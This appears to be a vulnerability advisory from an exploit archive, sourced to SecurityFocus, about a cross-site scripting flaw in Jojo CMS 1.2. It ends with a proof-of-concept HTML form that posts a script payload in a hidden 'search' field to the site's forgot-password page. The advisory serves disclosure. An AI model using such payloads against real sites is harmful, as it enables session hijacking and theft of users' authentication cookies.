12 lines
No EOL
623 B
Text
12 lines
No EOL
623 B
Text
source: https://www.securityfocus.com/bid/59933/info
|
|
|
|
Jojo CMS is prone to a cross-site scripting vulnerability.
|
|
|
|
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
|
|
Jojo CMS 1.2 is vulnerable; other versions may also be affected.
|
|
|
|
<form action="http://www.example.com/forgot-password/" method="post">
|
|
<input type="hidden" name="search" value='<script>alert(document.cookike);</script>'>
|
|
<input type="submit" id="btn">
|
|
</form> |